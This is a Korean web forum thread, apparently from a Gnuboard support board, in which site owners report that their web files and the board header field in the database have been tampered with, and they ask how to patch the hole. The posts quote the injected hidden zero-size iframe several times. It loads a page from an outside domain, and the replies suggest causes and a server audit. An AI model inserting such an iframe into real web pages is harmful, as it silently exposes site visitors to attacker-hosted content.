웹파일 변조가 삽입된 상태인데요..어떻게 해야될까요? 정보
웹파일 변조가 삽입된 상태인데요..어떻게 해야될까요?
관련링크
http://nwnews.hosting.paran.com
117회 연결
본문
웹파일 변조가 삽입된 상태입니다.
<?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe>
해당 스크립트를 삽입하면서 퍼지는것 같은데요
일부 수정을 하면서 업데이트 중입니다.
어떤부분을 패치해줘야 하나요?
<?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe>
해당 스크립트를 삽입하면서 퍼지는것 같은데요
일부 수정을 하면서 업데이트 중입니다.
어떤부분을 패치해줘야 하나요?
댓글 전체
저도 동일한 증상입니다... -_-;
패치를 해주면 된다던데 어떤것인지를 모르겠어요
일일이 하나씩 수정중이긴 한데요...또 나타나면...안될것 같아서요
일일이 하나씩 수정중이긴 한데요...또 나타나면...안될것 같아서요
일단 저두 패치는 계속 했었던 상황인데 업로드 폴더에 nobody소유권의 index.php 파일이 생성되어 있고 안을 보면 저소스가 있구 이부분은 폴더 권한 때문인거 같긴 합니다만,
그누보드 자체 특이점은 g4_board DB 테이블 안에
상단에 소스 넣는 필드 부분이 기존꺼 위에 전부 <?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe> 삽입 되어 있네요. 관리자에서 수정 페이지 부분에서 권한을 얻어서 임의로 수정 하는 걸까요? 패치는 꼬박 꼬박 했는데 혹시 놓친 부분이 있을려나요? 답변 좀 부탁드릴께요.
그누보드 자체 특이점은 g4_board DB 테이블 안에
상단에 소스 넣는 필드 부분이 기존꺼 위에 전부 <?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe> 삽입 되어 있네요. 관리자에서 수정 페이지 부분에서 권한을 얻어서 임의로 수정 하는 걸까요? 패치는 꼬박 꼬박 했는데 혹시 놓친 부분이 있을려나요? 답변 좀 부탁드릴께요.
일단 파일을 변경하는 권한을 얻은거니까 상당히 위험한 상황입니다.
그냥 include 해서 dbconfig.php 파일도 열어볼 수 있었겠지요.
서버 관리자에게 전체적인 점검 요청하시고요.
취약점을 찾아야합니다.
그냥 include 해서 dbconfig.php 파일도 열어볼 수 있었겠지요.
서버 관리자에게 전체적인 점검 요청하시고요.
취약점을 찾아야합니다.
그누보드 취약점일 수도 있고요 (그누에 파일 업로드 취약점이 있는지 잘 모르겠습니다)
서버에 깔린 FTP 등이나 다른 프로그램에서 문제가 발생했을 수도 있습니다
서버에 깔린 FTP 등이나 다른 프로그램에서 문제가 발생했을 수도 있습니다